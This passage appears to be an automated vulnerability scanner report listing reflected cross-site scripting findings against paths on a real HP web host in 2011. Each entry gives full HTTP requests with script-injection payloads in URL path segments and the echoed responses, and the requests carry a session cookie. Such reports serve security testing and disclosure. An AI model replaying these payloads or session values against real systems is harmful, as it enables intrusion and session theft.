Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:22 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30609


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/sound.jsc26bb"><script>alert(1)</script>16e93b14366?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.81. http://h30187.www3.hp.com/resources/scripts/swfobject.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/swfobject.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d07e"><script>alert(1)</script>8207582cd96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources6d07e"><script>alert(1)</script>8207582cd96/scripts/swfobject.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:57 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30835


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources6d07e"><script>alert(1)</script>8207582cd96/scripts/swfobject.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.82. http://h30187.www3.hp.com/resources/scripts/swfobject.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/swfobject.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3359"><script>alert(1)</script>57b0543e217 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scriptsf3359"><script>alert(1)</script>57b0543e217/swfobject.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:58 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30496


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsf3359"><script>alert(1)</script>57b0543e217/swfobject.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.83. http://h30187.www3.hp.com/resources/scripts/swfobject.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/swfobject.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2495"><script>alert(1)</script>35a8d132f3c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/swfobject.jsa2495"><script>alert(1)</script>35a8d132f3c?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:59 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30707


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/swfobject.jsa2495"><script>alert(1)</script>35a8d132f3c?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.84. http://h30187.www3.hp.com/resources/scripts/widget/loader.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/widget/loader.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cf1a"><script>alert(1)</script>3392b3ceb5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources4cf1a"><script>alert(1)</script>3392b3ceb5/scripts/widget/loader.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:58 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30603


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources4cf1a"><script>alert(1)</script>3392b3ceb5/scripts/widget/loader.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.85. http://h30187.www3.hp.com/resources/scripts/widget/loader.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/widget/loader.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe8e0"><script>alert(1)</script>3f3ede39727 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scriptsfe8e0"><script>alert(1)</script>3f3ede39727/widget/loader.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:43:59 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30938


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsfe8e0"><script>alert(1)</script>3f3ede39727/widget/loader.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.86. http://h30187.www3.hp.com/resources/scripts/widget/loader.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/widget/loader.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e19f"><script>alert(1)</script>526b6f59145 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/widget9e19f"><script>alert(1)</script>526b6f59145/loader.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:00 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30665


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/widget9e19f"><script>alert(1)</script>526b6f59145/loader.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.87. http://h30187.www3.hp.com/resources/scripts/widget/loader.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/widget/loader.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b7e7"><script>alert(1)</script>29741d37646 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/widget/loader.js1b7e7"><script>alert(1)</script>29741d37646?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:01 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30627


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/widget/loader.js1b7e7"><script>alert(1)</script>29741d37646?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.88. http://h30187.www3.hp.com/resources/scripts/widget/util.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/widget/util.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b659"><script>alert(1)</script>a61331b47f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources8b659"><script>alert(1)</script>a61331b47f9/scripts/widget/util.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:10 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30805


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources8b659"><script>alert(1)</script>a61331b47f9/scripts/widget/util.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.89. http://h30187.www3.hp.com/resources/scripts/widget/util.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/widget/util.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f05c4"><script>alert(1)</script>cb74612d597 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scriptsf05c4"><script>alert(1)</script>cb74612d597/widget/util.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:12 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30531


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scriptsf05c4"><script>alert(1)</script>cb74612d597/widget/util.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.90. http://h30187.www3.hp.com/resources/scripts/widget/util.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/widget/util.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbf2f"><script>alert(1)</script>11b0cdd28a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/widgetbbf2f"><script>alert(1)</script>11b0cdd28a4/util.js?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:13 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30907


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/widgetbbf2f"><script>alert(1)</script>11b0cdd28a4/util.js?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.91. http://h30187.www3.hp.com/resources/scripts/widget/util.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/scripts/widget/util.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6a40"><script>alert(1)</script>35a035cec2e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/scripts/widget/util.jsb6a40"><script>alert(1)</script>35a035cec2e?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:13 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30770


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/scripts/widget/util.jsb6a40"><script>alert(1)</script>35a035cec2e?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.92. http://h30187.www3.hp.com/resources/stylesheets/site.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/stylesheets/site.jsp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a135e"><script>alert(1)</script>2f39e748c96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resourcesa135e"><script>alert(1)</script>2f39e748c96/stylesheets/site.jsp?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 22:43:59 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Sat, 23-Sep-2079 01:58:06 GMT
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30706


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resourcesa135e"><script>alert(1)</script>2f39e748c96/stylesheets/site.jsp?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.93. http://h30187.www3.hp.com/resources/stylesheets/site.jsp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/stylesheets/site.jsp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbc38"><script>alert(1)</script>22bac2c020c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /resources/stylesheetsdbc38"><script>alert(1)</script>22bac2c020c/site.jsp?version=qbert-develop-201108301623-ff5f845 HTTP/1.1
Host: h30187.www3.hp.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://h30187.www3.hp.com/index.jspca059%22%3E%3Cscript%3Ealert(1)%3C/script%3Eaf8ce681eb5
Cookie: OAX=Mhd7ak5j/nsACORh; s_depth=3; s_vi=[CS]v1|2731FF4A05013C24-60000113200B199F[CE]; HP_EBUS_HP_CLICKS=3x3x53; s_sq=%5B%5BB%5D%5D; s_cc=true; prop12=r3990; _rmc_n=3; hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==

Response

HTTP/1.1 404 Not Found
Cache-Control: public,max-age=604800
Content-Type: text/html
Date: Sun, 04 Sep 2011 22:44:00 GMT
Server: nginx
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Connection: keep-alive
Content-Length: 30484


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">


<head>
<title>
HP
System Err
...[SNIP]...
<a class="udrline" href="http://h30187.www3.hp.com/resources/stylesheetsdbc38"><script>alert(1)</script>22bac2c020c/site.jsp?printable=true&version=qbert-develop-201108301623-ff5f845">
...[SNIP]...

3.94. http://h30187.www3.hp.com/resources/stylesheets/site.jsp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://h30187.www3.hp.com
Path:   /resources/stylesheets/site.jsp

Issue detail

